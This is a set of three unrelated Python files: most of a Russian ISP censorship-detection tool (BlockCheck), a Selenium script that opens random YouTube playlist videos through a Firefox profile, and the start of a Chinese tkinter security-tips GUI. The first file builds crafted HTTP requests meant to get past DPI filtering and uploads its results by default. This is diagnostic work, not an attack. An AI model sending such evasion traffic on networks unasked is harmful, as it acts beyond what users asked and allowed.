'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'значение Host БОЛЬШИМИ БУКВАМИ':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\r\nConnection: close\r\n\r\n".format(host.upper()),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'отсутствие пробела между двоеточием и значением заголовка Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host:{}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'перенос строки в заголовках в UNIX-стиле':
{'data': "GET {} HTTP/1.0\n".format(urn) + \
"Host: {}\nConnection: close\n\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'необычный порядок заголовков':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Connection: close\r\nHost: {}\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'фрагментирование заголовка, hoSt и отсутствие пробела одновременно':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"hoSt:{}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 2, 'fragment_count': 6},
'7 КБ данных перед Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Connection: close\r\n" + \
"X-Padding1: {}\r\n".format('1' * 1000) + \
"X-Padding2: {}\r\n".format('2' * 1000) + \
"X-Padding3: {}\r\n".format('3' * 1000) + \
"X-Padding4: {}\r\n".format('4' * 1000) + \
"X-Padding5: {}\r\n".format('5' * 1000) + \
"X-Padding6: {}\r\n".format('6' * 1000) + \
"X-Padding7: {}\r\n".format('7' * 1000) + \
"Host: {}\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'15 КБ данных перед Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Connection: close\r\n" + \
"X-Padding1: {}\r\n".format('1' * 1000) + \
"X-Padding2: {}\r\n".format('2' * 1000) + \
"X-Padding3: {}\r\n".format('3' * 1000) + \
"X-Padding4: {}\r\n".format('4' * 1000) + \
"X-Padding5: {}\r\n".format('5' * 1000) + \
"X-Padding6: {}\r\n".format('6' * 1000) + \
"X-Padding7: {}\r\n".format('7' * 1000) + \
"X-Padding8: {}\r\n".format('8' * 1000) + \
"X-Padding9: {}\r\n".format('9' * 1000) + \
"X-Padding10: {}\r\n".format('0' * 1000) + \
"X-Padding11: {}\r\n".format('1' * 1000) + \
"X-Padding12: {}\r\n".format('2' * 1000) + \
"X-Padding13: {}\r\n".format('3' * 1000) + \
"X-Padding14: {}\r\n".format('4' * 1000) + \
"X-Padding15: {}\r\n".format('5' * 1000) + \
"Host: {}\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'21 КБ данных перед Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Connection: close\r\n" + \
"X-Padding1: {}\r\n".format('1' * 3000) + \
"X-Padding2: {}\r\n".format('2' * 3000) + \
"X-Padding3: {}\r\n".format('3' * 3000) + \
"X-Padding4: {}\r\n".format('4' * 3000) + \
"X-Padding5: {}\r\n".format('5' * 3000) + \
"X-Padding6: {}\r\n".format('6' * 3000) + \
"X-Padding7: {}\r\n".format('7' * 3000) + \
"Host: {}\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
}
return dpi_built_list
def check_isup(page_url):
"""
    Check if the site is up using isup.me or whatever is set in
    `isup_fmt`. Return True if it's up, False if it's not, and None
    if isup.me itself is inaccessible or there was an error while
    getting the response.
    `page_url` must be a string and is presumed to be sanitized (it
    doesn't have to be the bare domain; isup.me accepts full URLs).
    isup.me can't check HTTPS URLs yet, so we return True for them.
    It's still useful to call check_isup even on HTTPS URLs for two
    reasons: we may switch to a service that can check them in the
    future, and check_isup will output a notification for the user.
"""
# Note that isup.me doesn't use HTTPS and therefore the ISP can slip
# false information (and if it gets blocked, the error page by the ISP can
# happen to have the markers we look for). We should inform the user about
# this possibility when showing results.
if disable_isup:
return True
elif page_url.startswith("https://"):
# print("[☠] {} не поддерживает HTTPS, считаем, что сайт работает, "
# "а проблемы только у нас".format(isup_server))
return True
print("\tПроверяем доступность через {}".format(isup_server))
url = isup_fmt.format(urllib.parse.urlparse(page_url).netloc)
status, output = _get_url(url)
# if output:
# output = json.loads(output)
if status in (0, -1):
print("[⁇] Ошибка при соединении с {}".format(isup_server))
return None
elif status != 200:
print("[⁇] Неожиданный ответ от {}, код {}".format(isup_server, status))
return None
elif 'upicon' in output:
print("[☠] Сайт доступен, проблемы только у нас")
return True
elif 'downicon' in output:
print("[✗] Сайт недоступен, видимо, он не работает")
return False
else:
print("[⁇] Не удалось распознать ответ от {}".format(isup_server))
return None
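# Usage sketch for check_isup() above: True means the remote checker reports
# the site as up (HTTPS URLs and disable_isup always yield True), False means
# it reports the site as down, and None means the checker itself was
# unreachable or gave an unrecognised answer; test_http_access() below counts
# a None as an ambiguous result.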
DNS_IPV4 = 0
DNS_IPV6 = 1
def test_dns(dnstype=DNS_IPV4):
sites_list = list(dns_records_list)
query_type = ("A" if dnstype == DNS_IPV4 else "AAAA")
print("[O] Тестируем " + ("IPv4" if dnstype == DNS_IPV4 else "IPv6") + " DNS")
resolved_default_dns = _get_a_records(sites_list, query_type)
print("\tЧерез системный DNS:\t", str(resolved_default_dns))
resolved_google_dns = _get_a_records(sites_list, query_type, (google_dns if dnstype == DNS_IPV4 else google_dns_v6))
if resolved_google_dns:
print("\tЧерез Google DNS:\t", str(resolved_google_dns))
else:
print("\tНе удалось подключиться к Google DNS")
resolved_google_api = _get_a_records(sites_list, query_type, googleapi=True)
if resolved_google_api:
print("\tЧерез Google API:\t", str(resolved_google_api))
else:
print("\tНе удалось подключиться к Google API")
really_bad_fuckup_happened()
resolved_fake_dns = _get_a_records((sites_list[0],), query_type, (fake_dns if dnstype == DNS_IPV4 else fake_dns_v6))
if resolved_fake_dns:
print("\tЧерез недоступный DNS:\t", str(resolved_fake_dns))
else:
print("\tНесуществующий DNS не вернул адресов (это не ошибка)")
if not resolved_default_dns:
print("[?] Ошибка получения адреса через системный DNS")
really_bad_fuckup_happened()
return 5
elif not resolved_google_dns:
print("[☠] Сторонние DNS блокируются")
return 4
# Assume that Google API always works and returns correct addresses
dns_records = resolved_google_api
if not dns_records:
print("[?] Не удалось связаться с Google API. Проверка DNS сломана.")
really_bad_fuckup_happened()
return 5
if resolved_default_dns == resolved_google_dns:
if not resolved_fake_dns and len(resolved_default_dns) == len(dns_records):
print("[✓] DNS-записи не подменяются")
print("[✓] DNS не перенаправляется")
return 0
if resolved_default_dns == dns_records:
# Resolved DNS = Google DNS = Google API, and fake
# DNS resolved something.
print("[✓] DNS-записи не подменяются")
print("[☠] DNS перенаправляется")
return 1
else:
print("[☠] DNS-записи подменяются")
print("[☠] DNS перенаправляется")
return 2
else:
if resolved_google_dns == dns_records:
print("[☠] DNS-записи подменяются")
print("[✓] DNS не перенаправляется")
return 3
if resolved_fake_dns:
# Resolved DNS != Google DNS != Google API, and fake DNS resolved something.
print("[☠] DNS-записи подменяются")
print("[☠] DNS перенаправляется")
return 2
print("[?] Способ блокировки DNS определить не удалось. "
"Убедитесь, что вы используете DNS провайдера, а не сторонний.")
really_bad_fuckup_happened()
return 5
HTTP_ACCESS_NOBLOCKS = 0
HTTP_ACCESS_IPBLOCK = 1
HTTP_ACCESS_IPDPI = 2
HTTP_ACCESS_FULLDPI = 3
HTTP_ISUP_ALLUP = 0
HTTP_ISUP_SOMEDOWN = 1
HTTP_ISUP_ALLDOWN = 2
HTTP_ISUP_BROKEN = 3
def test_http_access(by_ip=False):
"""
Test plain HTTP access and return three values:
1. The result - one of the HTTP_ACCESS_* constants
2. isup.me info - one of the HTTP_ISUP_* constants
3. Subdomain block result
"""
sites = http_list
proxy = proxy_addr
print("[O] Тестируем HTTP" + (' (по настоящим IP-адресам сайтов)' if by_ip else ''))
successes_v4 = 0
successes_v6 = 0
successes_proxy = 0
down = 0
blocks = 0
blocks_ambiguous = 0
blocks_subdomains = 0
result_v4 = -1
result_v6 = -1
for site in sorted(sites):
print("\tОткрываем ", site)
# First try to resolve IP address using Google API.
# Use a static one if this did not work.
if by_ip:
domain = list(urllib.parse.urlsplit(site))[1]
newip = _get_a_record_over_google_api(domain)
if ipv6_available:
newipv6 = _get_a_record_over_google_api(domain, 'AAAA')
if newip:
sites[site]['ip'] = newip[0]
if ipv6_available and sites[site].get('ipv6') and newipv6:
                sites[site]['ipv6'] = newipv6[0]  # _get_url() adds the IPv6 brackets itself
if ipv6_available:
result = _get_url(site, ip=sites[site].get('ip'), headers=True,
follow_redirects=sites[site].get('follow_redirects', True))
result_v6 = _get_url(site, ip=sites[site].get('ipv6'), headers=True,
follow_redirects=sites[site].get('follow_redirects', True))
else:
result = _get_url(site, ip=sites[site].get('ip') if by_ip else None,
headers=True,
follow_redirects=sites[site].get('follow_redirects', True))
result_ok = (result[0] == sites[site]['status'] and result[1].find(sites[site]['lookfor']) != -1)
if ipv6_available and sites[site].get('ipv6'):
result_v6_ok = (result_v6[0] == sites[site]['status'] and result_v6[1].find(sites[site]['lookfor']) != -1)
else:
result_v6_ok = True # Not really
if result_ok and result_v6_ok:
print("[✓] Сайт открывается")
if sites[site].get('is_blacklisted', True):
successes_v4 += 1
successes_v6 += 1
elif ipv6_available and (result_ok or result_v6_ok):
if not result_ok and result_v6_ok:
print("[!] Сайт открывается только по IPv6")
successes_v6 += 1
else:
print("[!] Сайт открывается только по IPv4")
successes_v4 += 1
if not (result_ok and result_v6_ok):
if (result[0] == sites[site]['status'] or (ipv6_available and result_v6[0] == sites[site]['status'])):
print("[☠] Получен неожиданный ответ, скорее всего, "
"страница-заглушка провайдера. Пробуем через прокси.")
else:
print("[☠] Сайт не открывается, пробуем через прокси")
result_proxy = _get_url(site, proxy)
if result_proxy[0] == sites[site]['status'] and result_proxy[1].find(sites[site]['lookfor']) != -1:
print("[✓] Сайт открывается через прокси")
if sites[site].get('is_blacklisted', True):
successes_proxy += 1
else:
if result_proxy[0] == sites[site]['status']:
print("[☠] Получен неожиданный ответ, скорее всего, "
"страница-заглушка провайдера. Считаем заблокированным.")
else:
print("[☠] Сайт не открывается через прокси")
isup = check_isup(site)
if isup is None:
if sites[site].get('is_blacklisted', True):
blocks_ambiguous += 1
elif isup:
if sites[site].get('subdomain'):
blocks_subdomains += 1
if sites[site].get('is_blacklisted', True):
blocks += 1
else:
if sites[site].get('is_blacklisted', True):
down += 1
all_sites = [http_list[i].get('is_blacklisted', True) for i in http_list].count(True)
# Result without isup.me
if successes_v4 == all_sites:
result_v4 = HTTP_ACCESS_NOBLOCKS
elif successes_v4 > 0 and successes_v4 + successes_proxy == all_sites:
result_v4 = HTTP_ACCESS_IPDPI
elif successes_v4 > 0:
result_v4 = HTTP_ACCESS_FULLDPI
else:
result_v4 = HTTP_ACCESS_IPBLOCK
if ipv6_available:
if successes_v6 == all_sites:
result_v6 = HTTP_ACCESS_NOBLOCKS
elif successes_v6 > 0 and successes_v6 + successes_proxy == all_sites:
result_v6 = HTTP_ACCESS_IPDPI
elif successes_v6 > 0:
result_v6 = HTTP_ACCESS_FULLDPI
else:
result_v6 = HTTP_ACCESS_IPBLOCK
# isup.me info
if blocks_ambiguous > 0:
isup = HTTP_ISUP_BROKEN
elif down == all_sites:
isup = HTTP_ISUP_ALLDOWN
elif down > 0:
isup = HTTP_ISUP_SOMEDOWN
else:
isup = HTTP_ISUP_ALLUP
return result_v4, result_v6, isup, (blocks_subdomains > 0)
def test_https_cert():
sites = https_list
isup_problems = False
print("[O] Тестируем HTTPS")
siteresults = []
for site in sorted(sites):
print("\tОткрываем ", site)
domain = list(urllib.parse.urlsplit(site))[1]
newip = _get_a_record_over_google_api(domain)
if newip:
newip = newip[0]
result = _get_url(site, ip=newip, follow_redirects=False)
else:
print_debug("Can't resolve IP for", site)
result = _get_url(site, follow_redirects=False)
if result[0] == -1:
print("[☠] Сертификат подменяется")
siteresults.append(False)
elif result[0] == 0:
print("[☠] Сайт не открывается")
if check_isup(site):
siteresults.append('no')
else:
isup_problems = True
else:
print("[✓] Сайт открывается")
siteresults.append(True)
if 'no' in siteresults:
# Blocked
return 2
elif False in siteresults:
# Wrong certificate
return 1
elif not isup_problems and all(siteresults):
# No blocks
return 0
else:
# Some sites are down or unknown result
return 3
def test_dpi():
global message_to_print
message_to_print = ""
print("[O] Тестируем обход DPI" + (' (только IPv4)' if ipv6_available else ''))
dpiresults = []
for dpisite in sorted(dpi_list):
site = dpi_list[dpisite]
# First try to resolve IP address using Google API.
# Use a static one if this did not work.
newip = _get_a_record_over_google_api(site['host'])
if newip:
site['ip'] = newip[0]
if ipv6_available:
newip = _get_a_record_over_google_api(site['host'], 'AAAA')
if newip:
site['ipv6'] = newip[0]
dpi_built_tests = _dpi_build_tests(site['host'], site['urn'], site['ip'], site['lookfor'])
for testname in sorted(dpi_built_tests):
test = dpi_built_tests[testname]
print("\tПробуем способ «{}» на {}".format(testname, dpisite))
try:
result = _dpi_send(test.get('ip'), 80, test.get('data'), test.get('fragment_size'),
test.get('fragment_count'))
except (KeyboardInterrupt, SystemExit) as e:
# re-raise exception to send it to caller function
raise e
except Exception as e:
print("[☠] Ошибка:", repr(e))
else:
if result.split("\n")[0].find('200 ') != -1 and result.find(test['lookfor']) != -1:
print("[✓] Сайт открывается")
dpiresults.append(testname)
elif result.split("\n")[0].find('200 ') == -1 and result.find(test['lookfor']) != -1:
print("[!] Сайт не открывается, обнаружен пассивный DPI!")
dpiresults.append('Passive DPI')
else:
print("[☠] Сайт не открывается")
if web_interface:
return message_to_print
return list(set(dpiresults))
def check_ipv6_availability():
print("Проверка работоспособности IPv6", end='')
v6addr = _get_a_record("ipv6.icanhazip.com", "AAAA")
if (v6addr):
v6 = _get_url("http://ipv6.icanhazip.com/", ip=v6addr[0])
if len(v6[1]):
v6src = v6[1].strip()
if force_ipv6 or (not ipaddress.IPv6Address(v6src).teredo
and not ipaddress.IPv6Address(v6src).sixtofour):
print(": IPv6 доступен!")
return v6src
else:
print(": обнаружен туннель Teredo или 6to4, игнорируем.")
return False
print(": IPv6 недоступен.")
return False
def get_ispinfo(ipaddr):
try:
rdap_response = ipwhois.IPWhois(ipaddr)
ispinfo = rdap_response.lookup_rdap(depth=1)
return ispinfo['asn']
except (ipwhois.exceptions.ASNRegistryError,
ipwhois.exceptions.ASNLookupError,
ipwhois.exceptions.ASNParseError,
ipwhois.exceptions.HTTPLookupError,
ipwhois.exceptions.HTTPRateLimitError):
return False
def main():
ipv6_addr = None
global ipv6_available
print("BlockCheck v{}".format(VERSION))
print("Для получения корректных результатов используйте DNS-сервер",
"провайдера и отключите средства обхода блокировок.")
print()
if web_interface:
return message_to_print
latest_version = _get_url("https://raw.githubusercontent.com/ValdikSS/blockcheck/master/latest_version.txt")
if latest_version[0] == 200 and latest_version[1].strip() != VERSION:
print("Доступная новая версия программы: {}. Обновитесь, пожалуйста.".format(latest_version[1].strip()))
print()
if not disable_ipv6:
ipv6_available = check_ipv6_availability()
if (ipv6_available):
ipv6_addr = ipv6_available
ip_isp = get_ip_and_isp()
if ip_isp:
if ipv6_available:
print("IP: {}, IPv6: {}, провайдер: {}".format(mask_ip(ip_isp[0]), mask_ip(ipv6_addr), ip_isp[1]))
if not force_ipv6:
asn4 = get_ispinfo(ip_isp[0])
asn6 = get_ispinfo(ipv6_addr)
if asn4 and asn6 and asn4 != asn6:
ipv6_available = False
print("Вероятно, у вас IPv6-туннель. Проверка IPv6 отключена.")
else:
print("IP: {}, провайдер: {}".format(mask_ip(ip_isp[0]), ip_isp[1]))
print()
dnsv4 = test_dns(DNS_IPV4)
dnsv6 = 0
if ipv6_available:
print()
dnsv6 = test_dns(DNS_IPV6)
print()
http_v4, http_v6, http_isup, subdomain_blocked = test_http_access((dnsv4 != 0) or (dnsv6 != 0))
print()
https = test_https_cert()
print()
dpi = '-'
if http_v4 > 0 or http_v6 > 0 or force_dpi_check:
dpi = test_dpi()
print()
print("[!] Результат:")
if dnsv4 == 5:
print("[⚠] Не удалось определить способ блокировки IPv4 DNS.\n",
"Верните настройки DNS провайдера, если вы используете сторонний DNS-сервер.",
"Если вы используете DNS провайдера, возможно, ответы DNS модифицирует вышестоящий",
"провайдер.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv4 == 4:
print("[⚠] Ваш провайдер блокирует сторонние IPv4 DNS-серверы.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv4 == 3:
print("[⚠] Ваш провайдер подменяет DNS-записи, но не перенаправляет сторонние IPv4 DNS-серверы на свой.\n",
"Вам поможет смена DNS, например, на Яндекс.DNS 77.88.8.8 или Google DNS 8.8.8.8 и 8.8.4.4.")
elif dnsv4 == 2:
print("[⚠] Ваш провайдер подменяет DNS-записи и перенаправляет сторонние IPv4 DNS-серверы на свой.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv4 == 1:
print("[⚠] Ваш провайдер перенаправляет сторонние IPv4 DNS-серверы на свой, но не подменяет DNS-записи.\n",
"Это несколько странно и часто встречается в мобильных сетях.\n",
"Если вы хотите использовать сторонний DNS, вам следует использовать шифрованный канал до " + \
"DNS-серверов, например, через VPN, Tor, HTTPS/Socks прокси или DNSCrypt, но обходу " + \
"блокировок это не поможет.")
if ipv6_available:
if dnsv6 == 5:
print("[⚠] Не удалось определить способ блокировки IPv6 DNS.\n",
"Верните настройки DNS провайдера, если вы используете сторонний DNS-сервер.",
"Если вы используете DNS провайдера, возможно, ответы DNS модифицирует вышестоящий",
"провайдер.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv6 == 4:
print("[⚠] Ваш провайдер блокирует сторонние IPv6 DNS-серверы.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv6 == 3:
print("[⚠] Ваш провайдер подменяет DNS-записи, но не перенаправляет сторонние IPv6 DNS-серверы на свой.\n",
"Вам поможет смена DNS, например, на Яндекс.DNS 2a02:6b8::feed:0ff или Google DNS 2001:4860:4860::8888.")
elif dnsv6 == 2:
print("[⚠] Ваш провайдер подменяет DNS-записи и перенаправляет сторонние IPv6 DNS-серверы на свой.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv6 == 1:
print("[⚠] Ваш провайдер перенаправляет сторонние IPv6 DNS-серверы на свой, но не подменяет DNS-записи.\n",
"Это несколько странно и часто встречается в мобильных сетях.\n",
"Если вы хотите использовать сторонний DNS, вам следует использовать шифрованный канал до " + \
"DNS-серверов, например, через VPN, Tor, HTTPS/Socks прокси или DNSCrypt, но обходу " + \
"блокировок это не поможет.")
if https == 1:
print("[⚠] Ваш провайдер подменяет HTTPS-сертификат на свой для сайтов из реестра.")
elif https == 2:
print("[⚠] Ваш провайдер полностью блокирует доступ к HTTPS-сайтам из реестра.")
elif https == 3:
print("[⚠] Доступ по HTTPS проверить не удалось, повторите тест позже.")
if subdomain_blocked:
print("[⚠] Ваш провайдер блокирует поддомены у заблокированного домена.")
if http_isup == HTTP_ISUP_BROKEN:
print("[⚠] {0} даёт неожиданные ответы или недоступен. Рекомендуем " \
"повторить тест, когда он начнёт работать. Возможно, эта " \
"версия программы устарела. Возможно (но маловероятно), " \
"что сам {0} уже занесён в чёрный список.".format(isup_server))
elif http_isup == HTTP_ISUP_ALLDOWN:
print("[⚠] Согласно {}, все проверяемые сайты сейчас не работают. " \
"Убедитесь, что вы используете последнюю версию программы, и " \
"повторите тест позже.".format(isup_server))
elif http_isup == HTTP_ISUP_SOMEDOWN:
print("[⚠] Согласно {}, часть проверяемых сайтов сейчас не работает. " \
"Убедитесь, что вы используете последнюю версию программы, и " \
"повторите тест позже.".format(isup_server))
elif http_isup != HTTP_ISUP_ALLUP:
print("[⚠] ВНУТРЕННЯЯ ОШИБКА ПРОГРАММЫ, http_isup = {}".format(http_isup))
def print_http_result(symbol, message):
if http_isup == HTTP_ISUP_ALLUP:
print("{} {}".format(symbol, message))
else:
# ACHTUNG: translating this program into other languages
# might be tricky. Not into English, though.
print("{} Если проигнорировать {}, то {}" \
.format(symbol, isup_server, message[0].lower() + message[1:]))
if http_v4 == HTTP_ACCESS_IPBLOCK:
if (ipv6_available and http_v6 == HTTP_ACCESS_IPBLOCK) or not ipv6_available:
print_http_result("[⚠]", "Ваш провайдер блокирует по IP-адресу. " \
"Используйте любой способ обхода блокировок.")
elif ipv6_available and http_v6 != HTTP_ACCESS_IPBLOCK:
print_http_result("[⚠]", "Ваш провайдер блокирует IPv4-сайты по IP-адресу. " \
"Используйте любой способ обхода блокировок.")
elif http_v4 == HTTP_ACCESS_FULLDPI:
if (ipv6_available and http_v6 == HTTP_ACCESS_FULLDPI) or not ipv6_available:
print_http_result("[⚠]", "У вашего провайдера \"полный\" DPI. Он " \
"отслеживает ссылки даже внутри прокси, " \
"поэтому вам следует использовать любое " \
"шифрованное соединение, например, " \
"VPN или Tor.")
elif ipv6_available and http_v6 != HTTP_ACCESS_FULLDPI:
print_http_result("[⚠]", "У вашего провайдера \"полный\" DPI для IPv4. Он " \
"отслеживает ссылки даже внутри прокси, " \
"поэтому вам следует использовать любое " \
"шифрованное соединение, например, " \
"VPN или Tor.")
elif http_v4 == HTTP_ACCESS_IPDPI:
if (ipv6_available and http_v6 == HTTP_ACCESS_IPDPI) or not ipv6_available:
print_http_result("[⚠]", "У вашего провайдера \"обычный\" DPI. " \
"Вам поможет HTTPS/Socks прокси, VPN или Tor.")
elif ipv6_available and http_v6 != HTTP_ACCESS_IPDPI:
print_http_result("[⚠]", "У вашего провайдера \"обычный\" DPI для IPv4. " \
"Вам поможет HTTPS/Socks прокси, VPN или Tor.")
elif http_isup == HTTP_ISUP_ALLUP and http_v4 == HTTP_ACCESS_NOBLOCKS \
and https == 0:
print_http_result("[☺]", "Ваш провайдер не блокирует сайты.")
if not disable_report:
try:
report_request = urllib.request.urlopen(
'http://blockcheck.antizapret.prostovpn.org/postdata.php',
data=urllib.parse.urlencode({
"text": printed_text,
"text_debug": printed_text_with_debug if really_bad_fuckup else '',
}).encode('utf-8')
)
if (report_request):
report_request.close()
except urllib.error.URLError as e:
# keep it silent
pass
if ip_isp:
need_help_isp_list = _get_url(
"https://raw.githubusercontent.com/ValdikSS/blockcheck/master/we_need_your_help_isp_list.txt")
if need_help_isp_list[0] == 200:
need_help_isp_list = need_help_isp_list[1]
for need_help_isp in need_help_isp_list.split("\n"):
need_help_isp = need_help_isp.strip().lower()
if need_help_isp and need_help_isp in ip_isp[1].lower():
print()
print("[⚠] Нам нужна ваша помощь!\n",
"Пожалуйста, помогите собрать расширенные данные о вашем провайдере:\n",
"https://github.com/ValdikSS/blockcheck/wiki/Нужна-ваша-помощь"
)
def setup_args():
if getattr(sys, 'frozen', False):
os.environ['SSL_CERT_FILE'] = os.path.join(sys._MEIPASS, 'lib', 'ca-certificates.crt')
parser = argparse.ArgumentParser(description='Определитель типа блокировки сайтов у провайдера.')
parser.add_argument('--console', action='store_true', help='Консольный режим. Отключает Tkinter GUI.')
parser.add_argument('--no-report', action='store_true',
help='Не отправлять результат на сервер (отправляется только выводимый текст).')
parser.add_argument('--no-isup', action='store_true',
help='Не проверять доступность сайтов через {}.' \
.format(isup_server))
parser.add_argument('--force-dpi-check', action='store_true',
help='Выполнить проверку DPI, даже если провайдер не блокирует сайты.')
parser.add_argument('--disable-ipv6', action='store_true', help='Отключить поддержку IPv6.')
parser.add_argument('--force-ipv6', action='store_true', help='Игнорировать обнаружение туннелей.')
parser.add_argument('--debug', action='store_true', help='Включить режим отладки (и --no-report).')
parser.add_argument('--web', action='store_true', help='Веб-интерфейс.')
args = parser.parse_args()
if args.console:
global tkusable
tkusable = False
if args.no_isup:
global disable_isup
disable_isup = True
if args.no_report:
global disable_report
disable_report = True
if args.force_dpi_check:
global force_dpi_check
force_dpi_check = True
if args.disable_ipv6:
global disable_ipv6
disable_ipv6 = True
if args.force_ipv6:
global force_ipv6
force_ipv6 = True
if args.debug:
global debug
debug = True
disable_report = True
if args.web:
global web_interface
web_interface = True
return 0
if __name__ == "__main__":
setup_args()
if tkusable:
root = tk.Tk()
root.title("BlockCheck")
root.protocol("WM_DELETE_WINDOW", tk_terminate)
text = ThreadSafeConsole(root, wrap=tk.WORD)
text.pack(expand=1, fill='both')
threading.Thread(target=main).start()
try:
root.mainloop()
except (KeyboardInterrupt, SystemExit):
os._exit(0)
else:
try:
main()
except (KeyboardInterrupt, SystemExit):
sys.exit(1)
|
good_mornings.py
|
import selenium
import glob
from numpy import arange
from random import sample
from sys import exit
from time import sleep
from progress.spinner import Spinner
from progress.bar import ChargingBar
from threading import Thread
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
def worker():
finish = False
sp = Spinner('Loading ')
cont = 0
    while not finish:
        sleep(1)
        cont += 1
        if cont == 60:
            finish = True
sp.next()
return
class YouMotivate:
def __init__(self):
# UNCOMMENT FOR TEMPORAL BARS WHILE LOADING WITH 60 SECONDS TIME {
# print('Managing Firefox Info')
# t = Thread(target=worker)
# t.start()
# }
opts = Options()
# UNCOMMENT FOR adding firefox user info {
users = glob.glob(r"C:\Users\*")
print("PC USERS:")
        users = [user.split("\\")[-1] for user in users]
print(users)
print("Choose one: ")
user = input()
        if user not in users:
print("That user does not exist")
exit()
binary = FirefoxBinary(r'C:\Program Files\Mozilla Firefox\firefox.exe')
profiles = glob.glob('C:\\Users\\'+str(user)+'\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*')
        profiles = [profile.split("\\")[-1] for profile in profiles]
print("choose profile (normally the one with default-release): ")
print(profiles)
profile = input()
        if profile not in profiles:
print("That profile does not exist")
exit()
fp = ('C:\\Users\\'+str(user)+'\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\'+str(profile))
opts.profile = fp
# }
self.driver = webdriver.Firefox(options=opts,
executable_path='geckodriver')
        print('Firefox Info Loaded successfully')
print('Opening Youtube...')
self.driver.get("https://www.youtube.com/playlist?list=FLHcrPEhUkZW37RI7c5FQvtw")
sleep(4)
#get num of videos in the list
num = self.driver.find_element_by_xpath('/html/body/ytd-app/div/ytd-page-manager/ytd-browse/ytd-playlist-sidebar-renderer/div/ytd-playlist-sidebar-primary-info-renderer/div[1]/yt-formatted-string[1]')
num = int(num.text.split(' ')[0])
# print('NUM OF VIDEOS:\t' + str(num))
vids = sample(list(arange(1,num+1)), 3)
        # print('CHOSEN:\t' + str(vids))
#choose those videos and open it in new tabs
bar = ChargingBar(' Opening videos', max=len(vids))
for i in vids:
vid_ref = self.driver.find_element_by_xpath('/html/body/ytd-app/div/ytd-page-manager/ytd-browse/ytd-two-column-browse-results-renderer/div[1]/ytd-section-list-renderer/div[2]/ytd-item-section-renderer/div[3]/ytd-playlist-video-list-renderer/div[3]/ytd-playlist-video-renderer['+str(i)+']/div[2]/a')
ref = vid_ref.get_attribute("href")
# print(ref)
self.driver.execute_script("window.open('"+str(ref)+"', 'new_window_"+str(i)+"')")
# self.driver.execute_script('browser.tabs.create({url:"'+str(ref)+'"});')
bar.next()
bar.finish()
ym = YouMotivate()
exit()
|
Main.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author:Sh4d0w_小白
from tkinter import *
from Content import *
from threading import Thread
import sys
window = Tk()
checkButton = []
boxButton = []
var = []
var.append(IntVar())
pageNum = round(len(checkButtonText) / 9)
pageIndex = 1
treasureBox = Toplevel()
max = 0
def Init():
global x,y
treasureBox.withdraw()
    # Initialize the windows
    window.title("网络安全技巧")  # main window title ("Network Security Tips")
    treasureBox.title("百宝箱")  # toolbox window title ("Treasure Box")
    # Window position settings
screenWidth = window.winfo_screenwidth()
screenHeight = window.winfo_screenheight()
x = int((screenWidth - 800) / 2)
y = int((screenHeight - 600) / 2)
window.geometry("%sx%s+%s+%s" % (800, 600, x, y))
window.resizable(0, 0)
treasureBox.geometry("%sx%s+%s+%s" % (800, 600, x, y))
treasureBox.resizable(0, 0)
def MainContainer():
global max
    # Checkboxes for the current page
if (pageIndex * 9 + 1 > len(checkButtonText)):
max = len(checkButtonText)
else:
max = pageIndex * 9
for i in range((pageIndex - 1) * 9, max):
var.append(IntVar())
checkButton.append(Checkbutton(window, text = checkButtonText[i], variable = var[i + 1], height = 3, justify = LEFT))
if (i - (pageIndex - 1) * 9) / 3 < 1:
checkButton[i].grid(row = 1, column = i % 3, padx = 50, pady = 50, sticky = W)
elif (i - (pageIndex - 1) * 9) / 3 < 2:
checkButton[i].grid(row = 2, column = i % 3, padx = 50, pady = 50, sticky = W)
elif (i - (pageIndex - 1) * 9) / 3 < 3:
checkButton[i].grid(row = 3, column = i % 3, padx = 50, pady = 50, sticky = W)
def GetFunction(i):
return checkButtonFunction[i]()
# "优化" (Optimize) button
def Work():
    for i in range((pageIndex - 1) * 9, max):
        if var[i + 1].get() == 1:
            GetFunction(i)
    IsOk()
